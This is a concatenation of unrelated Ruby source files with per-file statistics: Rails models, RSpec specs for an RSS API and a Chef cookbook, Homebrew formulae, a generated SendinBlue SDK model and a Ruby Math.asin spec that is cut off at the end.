      rescue StateMachines::InvalidTransition => e
        # The bridge may be in a state that forbids this transition; report
        # the error to tracking instead of failing the whole flow.
        Gitlab::ErrorTracking.track_exception(
          Ci::Bridge::InvalidTransitionError.new(e.message),
          bridge_id: pipeline.source_bridge.id,
          downstream_pipeline_id: pipeline.id)
      end
    end
  end
end

Ci::PipelineBridgeStatusService.prepend_if_ee('EE::Ci::PipelineBridgeStatusService')
| 29.52381 | 84 | 0.733871 |
1abfe4035326afa5a0ad5d09550935af08e2e31f | 499 | class User < ActiveRecord::Base
# NOTE(review): singular association name with has_many — confirm the
# DoneList model/table naming is intentional.
has_many :done_list

# Builds and persists a User from an OmniAuth auth hash
# (provider, uid, nickname and display name).
def self.create_with_omniauth(auth)
  #instruction(auth['info']['nickname'])
  create! do |user|
    user.provider = auth['provider']
    user.uid = auth['uid']
    user.screen_name = auth['info']['nickname']
    user.name = auth['info']['name']
  end
end
private

# Prints (and, when the commented line is re-enabled, tweets) a welcome
# message to the newly registered user.
def self.instruction(screen_name)
  msg = "#{screen_name}さん、登録ありがとう!登録した時間に「お薬のんだ?」とつぶやきます。のんだら返信してね!"
  p msg
  #$tw_client.update(msg)
end
# BUGFIX: a bare `private` does not affect methods defined with `def self.`;
# `private_class_method` is required to actually hide this class method.
private_class_method :instruction
end
| 23.761905 | 70 | 0.645291 |
87362a4969cb89040f0a99201bd15c54f7765cd5 | 6,196 | require 'spec_helper'
require './fever_api'

# Rack::Test specs for the Fever-compatible API endpoint: api_key
# authentication, the GET query headers (groups/feeds/favicons/items/...)
# and the POST mark-as-read/unread/saved/unsaved commands.
describe FeverAPI do
  include Rack::Test::Methods

  def app
    FeverAPI::Endpoint
  end

  let(:api_key) { 'apisecretkey' }
  let(:story_one) { StoryFactory.build }
  let(:story_two) { StoryFactory.build }
  let(:feed) { FeedFactory.build }
  # NOTE(review): :stories appears unused by the examples below.
  let(:stories) { [story_one, story_two] }
  let(:answer) { { api_version: 3, auth: 1, last_refreshed_on_time: Time.now.to_i } }
  let(:headers) { { api_key: api_key } }

  before do
    user = stub(api_key: api_key)
    User.stub(:first).and_return(user)
  end

  describe "authentication" do
    it "authenticates request with correct api_key" do
      get "/", headers
      last_response.should be_ok
    end

    it "does not authenticate request with incorrect api_key" do
      get "/", api_key: 'foo'
      last_response.should_not be_ok
    end

    it "does not authenticate request when api_key is not provided" do
      get "/"
      last_response.should_not be_ok
    end
  end

  describe "#get" do
    def make_request(extra_headers = {})
      get "/", headers.merge(extra_headers)
    end

    # NOTE(review): "standart" is a typo for "standard" in the example name.
    it "returns standart answer" do
      make_request
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns groups and feeds by groups when 'groups' header is provided" do
      FeedRepository.stub(:list).and_return([feed])
      make_request({ groups: nil })
      answer.merge!({ groups: [{ id: 1, title: "All items" }], feeds_groups: [{ group_id: 1, feed_ids: feed.id.to_s }] })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns feeds and feeds by groups when 'feeds' header is provided" do
      Feed.stub(:all).and_return([feed])
      FeedRepository.stub(:list).and_return([feed])
      make_request({ feeds: nil })
      answer.merge!({ feeds: [feed.as_fever_json], feeds_groups: [{ group_id: 1, feed_ids: feed.id.to_s }] })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns favicons hash when 'favicons' header provided" do
      make_request({ favicons: nil })
      answer.merge!({ favicons: [{ id: 0, data: "image/gif;base64,R0lGODlhAQABAIAAAObm5gAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" }] })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns stories when 'items' header is provided along with 'since_id'" do
      StoryRepository.should_receive(:unread_since_id).with('5').and_return([story_one])
      StoryRepository.should_receive(:unread).and_return([story_one, story_two])
      make_request({ items: nil, since_id: 5 })
      answer.merge!({ items: [story_one.as_fever_json], total_items: 2 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns stories when 'items' header is provided without 'since_id'" do
      StoryRepository.should_receive(:unread).twice.and_return([story_one, story_two])
      make_request({ items: nil })
      answer.merge!({ items: [story_one.as_fever_json, story_two.as_fever_json], total_items: 2 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns stories ids when 'items' header is provided along with 'with_ids'" do
      StoryRepository.should_receive(:fetch_by_ids).twice.with(['5']).and_return([story_one])
      make_request({ items: nil, with_ids: 5 })
      answer.merge!({ items: [story_one.as_fever_json], total_items: 1 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns links as empty array when 'links' header is provided" do
      make_request({ links: nil })
      answer.merge!({ links: [] })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns unread items ids when 'unread_item_ids' header is provided" do
      StoryRepository.should_receive(:unread).and_return([story_one, story_two])
      make_request({ unread_item_ids: nil })
      answer.merge!({ unread_item_ids: [story_one.id,story_two.id].join(',') })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "returns starred items when 'saved_item_ids' header is provided" do
      Story.should_receive(:where).with({ is_starred: true }).and_return([story_one, story_two])
      make_request({ saved_item_ids: nil })
      answer.merge!({ saved_item_ids: [story_one.id,story_two.id].join(',') })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end
  end

  describe "#post" do
    def make_request(extra_headers = {})
      post "/", headers.merge(extra_headers)
    end

    it "commands to mark story as read" do
      MarkAsRead.should_receive(:new).with('10').and_return(stub(mark_as_read: true))
      make_request({ mark: 'item', as: 'read', id: 10 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "commands to mark story as unread" do
      MarkAsUnread.should_receive(:new).with('10').and_return(stub(mark_as_unread: true))
      make_request({ mark: 'item', as: 'unread', id: 10 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "commands to save story" do
      MarkAsStarred.should_receive(:new).with('10').and_return(stub(mark_as_starred: true))
      make_request({ mark: 'item', as: 'saved', id: 10 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "commands to unsave story" do
      MarkAsUnstarred.should_receive(:new).with('10').and_return(stub(mark_as_unstarred: true))
      make_request({ mark: 'item', as: 'unsaved', id: 10 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end

    it "commands to mark group as read" do
      MarkGroupAsRead.should_receive(:new).with('10', '1375080946').and_return(stub(mark_group_as_read: true))
      make_request({ mark: 'group', as: 'read', id: 10, before: 1375080946 })
      last_response.should be_ok
      last_response.body.should == answer.to_json
    end
  end
end
b951b0a74868b0d8accad6a32d61d827d159841d | 1,526 | # Copyright (c) 2018-2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: MIT
# DO NOT MODIFY. THIS CODE IS GENERATED. CHANGES WILL BE OVERWRITTEN.
# vcenter - VMware vCenter Server provides a centralized platform for managing your VMware vSphere environments
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'VcenterVchaClusterNodeInfo' do
before do
# run before each test
@instance = VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo.new
end
after do
# run after each test
end
describe 'test an instance of VcenterVchaClusterNodeInfo' do
it 'should create an instance of VcenterVchaClusterNodeInfo' do
expect(@instance).to be_instance_of(VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo)
end
end
describe 'test attribute "failover_ip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "ha_ip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "runtime"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 30.52 | 111 | 0.749017 |
08fe14a7c3af7af29e7ad0718ab776c7d3b60519 | 1,958 | class Datree < Formula
desc "CLI tool to run policies against Kubernetes manifests YAML files or Helm charts"
homepage "https://www.datree.io/"
url "https://github.com/datreeio/datree/archive/1.2.0.tar.gz"
sha256 "ed579d04e500b2963c627b5e03fc34f5ebca40430557d7598ff8c2fe7d42ac6f"
license "Apache-2.0"
head "https://github.com/datreeio/datree.git", branch: "main"

livecheck do
  url :stable
  strategy :github_latest
end

bottle do
  sha256 cellar: :any_skip_relocation, arm64_monterey: "b9c2f54a6a35259d56826312c6e49623925ca36cc09aeed6b541f23bb91a5fcd"
  sha256 cellar: :any_skip_relocation, arm64_big_sur:  "1f0f19befb562df4fd0d8f5b4e9732e10537ea0573cda978389a22c60a2a0477"
  sha256 cellar: :any_skip_relocation, monterey:       "b2b4df75a0a0641138ee336b5618b02b5b853f9202ac0dbacdb19f4635b50c3e"
  sha256 cellar: :any_skip_relocation, big_sur:        "f03ad58582e57f18f047b4b3b4922c5ac83e2f5621e04943c9cb890fc7ab0a78"
  sha256 cellar: :any_skip_relocation, catalina:       "536369de079f79c6f306a4412f00102180d08c362614f143047767e2bbe6a4a8"
  sha256 cellar: :any_skip_relocation, x86_64_linux:   "aa3f1defbc938faac36f4d9a7155fcc47efae222364d5a6372c93e56980c1a59"
end

depends_on "go" => :build

def install
  # ldflags stamps the CLI version into the binary at build time.
  system "go", "build", *std_go_args(ldflags: "-s -w -X github.com/datreeio/datree/cmd.CliVersion=#{version}"), "-tags", "main"
end

test do
  # An intentionally invalid manifest ('apiversion' instead of 'apiVersion')
  # must make `datree test` exit with status 2 and report the schema error.
  # NOTE(review): heredoc indentation reconstructed as conventional YAML.
  (testpath/"invalidK8sSchema.yaml").write <<~EOS
    apiversion: v1
    kind: Service
    metadata:
      name: my-service
    spec:
      selector:
        app: MyApp
      ports:
        - protocol: TCP
          port: 80
          targetPort: 9376
  EOS
  assert_match "k8s schema validation error: For field (root): Additional property apiversion is not allowed",
    shell_output("#{bin}/datree test #{testpath}/invalidK8sSchema.yaml 2>&1", 2)
  assert_equal "#{version}\n", shell_output("#{bin}/datree version")
end
end
| 39.16 | 129 | 0.73238 |
ab11e2a5e6af0ad04b4fc39b7718e6dc4d4e9068 | 845 | cask 'brave-browser-beta' do
  # Version is "app_version,build"; the post-comma build id selects the CDN path.
  version '80.1.7.80,107.80'
  sha256 '3e367a226cf197d79cd48b2cdeeea497d21b17bb5c4d325a4331fb25f472ba1a'

  # updates-cdn.bravesoftware.com/sparkle/Brave-Browser was verified as official when first introduced to the cask
  url "https://updates-cdn.bravesoftware.com/sparkle/Brave-Browser/beta/#{version.after_comma}/Brave-Browser-Beta.dmg"
  appcast 'https://updates.bravesoftware.com/sparkle/Brave-Browser/beta/appcast.xml'
  name 'Brave Beta'
  homepage 'https://brave.com/download-beta/'

  # The app self-updates via Sparkle, so Homebrew need not reinstall on upgrade.
  auto_updates true
  depends_on macos: '>= :mavericks'

  app 'Brave Browser Beta.app'

  # Residual files removed by `brew uninstall --zap`.
  zap trash: [
               '~/Library/Application Support/brave',
               '~/Library/Preferences/com.electron.brave.plist',
               '~/Library/Saved Application State/com.electron.brave.savedState',
             ]
end
| 38.409091 | 118 | 0.719527 |
1dbc1ffce05a10f160cda7433b011863880764ba | 1,376 | #
# Be sure to run `pod lib lint DcMVVM.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'DcMVVMTest'
s.version = '0.1.0'
s.summary = 'Test tools for DcMVVM.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
Set of protocols, extensions and mocks which help to test MVVM components if DcMVVM framework.
DESC
s.homepage = 'https://github.com/beherith13/DcMVVMTest'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = 'Siarhei Bykau'
s.source = { :git => 'https://github.com/beherith13/DcMVVM.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.swift_version = '5.0'
s.subspec "Core" do |sb|
sb.dependency 'DcMVVM/Core'
sb.source_files = "Sources/DcMVVMTest/Core/**/*.swift"
end
s.default_subspecs = 'Core'
end
| 34.4 | 101 | 0.642442 |
6ad634627918d4a4dde098e312b36f0f4ff9f330 | 40 | class Employer < ActiveRecord::Base
end
| 13.333333 | 35 | 0.8 |
f850fd731d3e173a1307abe7de0649920b76d14e | 1,430 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'User sees Security Configuration table', :js do
let_it_be(:user) { create(:user) }
let_it_be(:project) { create(:project, :repository) }
before_all do
project.add_developer(user)
end
before do
sign_in(user)
end
context 'with security_dashboard feature available' do
before do
stub_licensed_features(security_dashboard: true)
end
context 'with no SAST report' do
it 'shows SAST is not enabled' do
visit(project_security_configuration_path(project))
within_sast_row do
expect(page).to have_text('SAST')
expect(page).to have_text('Not enabled')
expect(page).to have_css('[data-testid="enableButton"]')
end
end
end
context 'with SAST report' do
before do
pipeline = create(:ci_pipeline, project: project)
create(:ci_build, :sast, pipeline: pipeline, status: 'success')
end
it 'shows SAST is enabled' do
visit(project_security_configuration_path(project))
within_sast_row do
expect(page).to have_text('SAST')
expect(page).to have_text('Enabled')
expect(page).to have_css('[data-testid="configureButton"]')
end
end
end
end
def within_sast_row
within '[data-testid="security-scanner-row"]:nth-of-type(1)' do
yield
end
end
end
| 24.655172 | 71 | 0.653147 |
39828a7cb958f3a24b35941c5575c3150eea9338 | 206 | require "test_helper"
# Generated gem scaffold tests for Yarcsv.
class YarcsvTest < Test::Unit::TestCase
  # Sanity check that the gem defines its VERSION constant.
  def test_that_it_has_a_version_number
    refute_nil ::Yarcsv::VERSION
  end

  # Placeholder left by `bundle gem`; intentionally failing until a real
  # test is written.
  def test_it_does_something_useful
    assert false
  end
end
| 17.166667 | 39 | 0.776699 |
4a1a45723c33a461f4780f652ab58a265348c76b | 742 | class Phpmd < Formula
  desc "PHP Mess Detector"
  homepage "https://phpmd.org"
  # Upstream ships a prebuilt phar, which is installed as-is.
  url "https://github.com/phpmd/phpmd/releases/download/2.8.2/phpmd.phar"
  sha256 "0b531cbbc18a26115eede06077d5670e1f4fd0a8545d7fe547adf068fb7f18c5"

  # Nothing to compile, so no bottle is required.
  bottle :unneeded

  def install
    # Install the phar under the conventional command name.
    bin.install "phpmd.phar" => "phpmd"
  end

  test do
    # Run the "unusedcode" ruleset against a class with an unused parameter
    # and expect phpmd to flag it (--ignore-violations-on-exit keeps the
    # exit status zero even when violations are found).
    (testpath/"src/HelloWorld/Greetings.php").write <<~EOS
      <?php
      namespace HelloWorld;
      class Greetings {
        public static function sayHelloWorld($name) {
          return 'HelloHomebrew';
        }
      }
    EOS
    assert_match /Avoid unused parameters such as '\$name'\.$/,
      shell_output("#{bin}/phpmd --ignore-violations-on-exit src/HelloWorld/Greetings.php text unusedcode")
  end
end
| 26.5 | 107 | 0.680593 |
619fef109af8e28823f0026e42ab5fb341f1b06e | 4,141 | class Hdf5 < Formula
desc "File format designed to store large amounts of data"
homepage "https://www.hdfgroup.org/HDF5"
url "https://support.hdfgroup.org/ftp/HDF5/releases/hdf5-1.12/hdf5-1.12.0/src/hdf5-1.12.0.tar.bz2"
sha256 "97906268640a6e9ce0cde703d5a71c9ac3092eded729591279bf2e3ca9765f61"
license "BSD-3-Clause"
revision 1
livecheck do
url "https://www.hdfgroup.org/downloads/hdf5/"
regex(/Newsletter for HDF5[._-]v?(.*?) Release/i)
end
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "2eb3e73920211c3b9f2b8fb3e2bd39d00dfd5069812e3639bb39d4cfe7d78cab"
sha256 cellar: :any_skip_relocation, big_sur: "7cd7cdc13241744c74a94eb578575c357cf263ff0228251a7882a9b7452bac92"
sha256 cellar: :any_skip_relocation, catalina: "ff70299b918490134fb3e883110f0092d591885db3fc798f2cc0f48cd9472f36"
sha256 cellar: :any_skip_relocation, mojave: "450afa0c0e0783b416e67df0d2a56c5f12518df65ba0326884e06f3388c5c445"
sha256 cellar: :any_skip_relocation, high_sierra: "541d0b241a81248d8b6c3d3b205fb3f319e5cefe751d7750aa2749b9696ff749"
sha256 cellar: :any_skip_relocation, x86_64_linux: "50af52d419009a547d5e480925dd6f88817753f6a835b9259bfc036b222f19e0"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "gcc" # for gfortran
depends_on "szip"
uses_from_macos "zlib"
def install
inreplace %w[c++/src/h5c++.in fortran/src/h5fc.in bin/h5cc.in],
"${libdir}/libhdf5.settings",
"#{pkgshare}/libhdf5.settings"
inreplace "src/Makefile.am",
"settingsdir=$(libdir)",
"settingsdir=#{pkgshare}"
system "autoreconf", "-fiv"
args = %W[
--disable-dependency-tracking
--disable-silent-rules
--prefix=#{prefix}
--with-szlib=#{Formula["szip"].opt_prefix}
--enable-build-mode=production
--enable-fortran
--enable-cxx
]
on_linux do
args << "--with-zlib=#{Formula["zlib"].opt_prefix}"
end
system "./configure", *args
# Avoid shims in settings file
on_macos do
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/mac/super/clang", "/usr/bin/clang"
end
on_linux do
gcc_major_ver = Formula["gcc"].any_installed_version.major
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/linux/super/g++-#{gcc_major_ver}",
Formula["gcc"].opt_bin/"g++"
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/linux/super/gcc-#{gcc_major_ver}",
Formula["gcc"].opt_bin/"gcc"
end
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include "hdf5.h"
int main()
{
printf("%d.%d.%d\\n", H5_VERS_MAJOR, H5_VERS_MINOR, H5_VERS_RELEASE);
return 0;
}
EOS
system "#{bin}/h5cc", "test.c"
assert_equal version.to_s, shell_output("./a.out").chomp
(testpath/"test.f90").write <<~EOS
use hdf5
integer(hid_t) :: f, dspace, dset
integer(hsize_t), dimension(2) :: dims = [2, 2]
integer :: error = 0, major, minor, rel
call h5open_f (error)
if (error /= 0) call abort
call h5fcreate_f ("test.h5", H5F_ACC_TRUNC_F, f, error)
if (error /= 0) call abort
call h5screate_simple_f (2, dims, dspace, error)
if (error /= 0) call abort
call h5dcreate_f (f, "data", H5T_NATIVE_INTEGER, dspace, dset, error)
if (error /= 0) call abort
call h5dclose_f (dset, error)
if (error /= 0) call abort
call h5sclose_f (dspace, error)
if (error /= 0) call abort
call h5fclose_f (f, error)
if (error /= 0) call abort
call h5close_f (error)
if (error /= 0) call abort
CALL h5get_libversion_f (major, minor, rel, error)
if (error /= 0) call abort
write (*,"(I0,'.',I0,'.',I0)") major, minor, rel
end
EOS
system "#{bin}/h5fc", "test.f90"
assert_equal version.to_s, shell_output("./a.out").chomp
end
end
| 35.698276 | 122 | 0.654673 |
38b1ed5337fe1bc633b590000f51dbaabc6e35db | 61 | Chartkick.options = {
colors: ["red", "orange", "green"]
}
| 15.25 | 36 | 0.590164 |
ff033d9b3856a6d58c4101b3067c6bfb9908a666 | 146 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_salesAppServer_session'
| 36.5 | 84 | 0.815068 |
616b219e29c357c614974c8913667ad98fde2ba0 | 7,281 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.18
=end
require 'date'
module SibApiV3Sdk
class GetContactCampaignStatsUnsubscriptions
# Contact has unsubscribed via the unsubscription link in the email
attr_accessor :user_unsubscription
# Contact has been unsubscribed from the administrator
attr_accessor :admin_unsubscription
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'user_unsubscription' => :'userUnsubscription',
:'admin_unsubscription' => :'adminUnsubscription'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'user_unsubscription' => :'Array<GetExtendedContactDetailsStatisticsUnsubscriptionsUserUnsubscription>',
:'admin_unsubscription' => :'Array<GetExtendedContactDetailsStatisticsUnsubscriptionsAdminUnsubscription>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'userUnsubscription')
if (value = attributes[:'userUnsubscription']).is_a?(Array)
self.user_unsubscription = value
end
end
if attributes.has_key?(:'adminUnsubscription')
if (value = attributes[:'adminUnsubscription']).is_a?(Array)
self.admin_unsubscription = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @user_unsubscription.nil?
invalid_properties.push('invalid value for "user_unsubscription", user_unsubscription cannot be nil.')
end
if @admin_unsubscription.nil?
invalid_properties.push('invalid value for "admin_unsubscription", admin_unsubscription cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @user_unsubscription.nil?
return false if @admin_unsubscription.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
user_unsubscription == o.user_unsubscription &&
admin_unsubscription == o.admin_unsubscription
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[user_unsubscription, admin_unsubscription].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 34.671429 | 839 | 0.643318 |
873f9d1845e7ed1d60dfc59447da0351daaf5ab5 | 1,969 | #
# Cookbook Name:: eos
# Spec:: default
#
# Copyright (c) 2016 Arista Networks, All Rights Reserved.
require 'spec_helper'
describe 'eos::default' do
context 'When all attributes are default, on an unspecified platform' do
let(:chef_run) do
runner = ChefSpec::ServerRunner.new(platform: 'fedora', version: '18')
runner.converge(described_recipe)
end
before(:each) do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(true)
stub_command('test -S /var/run/command-api.sock').and_return(true)
end
it 'converges successfully with eAPI configured' do
expect { chef_run }.to_not raise_error
end
it 'converges successfully with eAPI not configured' do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(false)
expect { chef_run }.to_not raise_error
end
it 'configures eAPI for unix-sockets when not detected' do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(false)
expect(chef_run).to run_execute('Enable eAPI')
end
it 'does not reconfigure eAPI for unix-sockets when detected' do
expect(chef_run).to_not run_execute('Enable eAPI')
end
it 'ensures base chef files are persistent' do
expect(chef_run).to create_directory('/persist/sys/chef').with(
owner: 'root',
group: 'root',
mode: '0755'
)
expect(chef_run).to create_link('/etc/chef').with(
to: '/persist/sys/chef'
)
end
it 'installs rbeapi as a chef_gem' do
expect(chef_run).to install_chef_gem('rbeapi')
end
it 'installs ohai plugins' do
expect(chef_run).to create_ohai_plugin('eos')
expect(chef_run).to create_ohai_plugin('eos_hostname')
expect(chef_run).to create_ohai_plugin('eos_lldp_neighbors')
end
end
end
| 30.765625 | 80 | 0.670899 |
3833c82935d36886afb60ef480d519db55b6f762 | 1,979 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150129141225) do
create_table "cities", force: :cascade do |t|
t.text "name"
t.integer "population_2013"
t.integer "population_2010"
t.float "population_change"
t.integer "population_density"
t.integer "state_id"
end
create_table "coaches", force: :cascade do |t|
t.string "name"
t.integer "team"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "wins"
t.integer "losses"
end
create_table "games", force: :cascade do |t|
t.datetime "quoted_date"
t.integer "home_team"
t.integer "away_team"
t.integer "home_score"
t.integer "away_score"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "states", force: :cascade do |t|
t.text "name"
t.text "abbr"
t.text "capital"
t.text "biggest_city"
t.integer "population"
t.integer "area"
end
create_table "teams", force: :cascade do |t|
t.text "name"
t.integer "wins"
t.integer "losses"
t.integer "ties"
t.text "division"
t.text "conference"
t.boolean "playoff"
t.integer "city_id"
end
end
| 30.446154 | 86 | 0.690753 |
26f689e497f97bda491979ace803e604ab6d04b3 | 525 | # frozen_string_literal: true
class Github::Actor < Github::Client
def self.get(date: nil)
new.get(date)
end
def get(date)
if date
response = @client.search_issues "repo:oss-gate/workshop is:issue created: #{date.to_s}"
else
response = @client.search_issues 'repo:oss-gate/workshop is:issue'
end
response.items.each do |res|
::Actor.create(name: res[:user][:login], icon_url: res[:user][:avatar_url])
rescue ActiveRecord::RecordNotUnique => e
puts e
end
end
end
| 23.863636 | 94 | 0.664762 |
d555416afebf23494b5e74525c02e5fe7d1a01b9 | 1,848 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
# arcsine : (-1.0, 1.0) --> (-PI/2, PI/2)
describe "Math.asin" do
it "return a float" do
Math.asin(1).class.should == Float
end
it "returns the arcsine of the argument" do
Math.asin(1).should be_close(Math::PI/2, TOLERANCE)
Math.asin(0).should be_close(0.0, TOLERANCE)
Math.asin(-1).should be_close(-Math::PI/2, TOLERANCE)
Math.asin(0.25).should be_close(0.252680255142079, TOLERANCE)
Math.asin(0.50).should be_close(0.523598775598299, TOLERANCE)
Math.asin(0.75).should be_close(0.8480620789814816,TOLERANCE)
end
conflicts_with :Complex do
it "raises an Errno::EDOM if the argument is greater than 1.0" do
lambda { Math.asin(1.0001) }.should raise_error( Errno::EDOM)
end
it "raises an Errno::EDOM if the argument is less than -1.0" do
lambda { Math.asin(-1.0001) }.should raise_error( Errno::EDOM)
end
end
ruby_version_is ""..."1.9" do
it "raises an ArgumentError if the argument cannot be coerced with Float()" do
lambda { Math.asin("test") }.should raise_error(ArgumentError)
end
end
ruby_version_is "1.9" do
it "raises a TypeError if the argument cannot be coerced with Float()" do
lambda { Math.asin("test") }.should raise_error(TypeError)
end
end
it "raises a TypeError if the argument is nil" do
lambda { Math.asin(nil) }.should raise_error(TypeError)
end
it "accepts any argument that can be coerced with Float()" do
Math.asin(MathSpecs::Float.new).should be_close(1.5707963267949, TOLERANCE)
end
end
describe "Math#asin" do
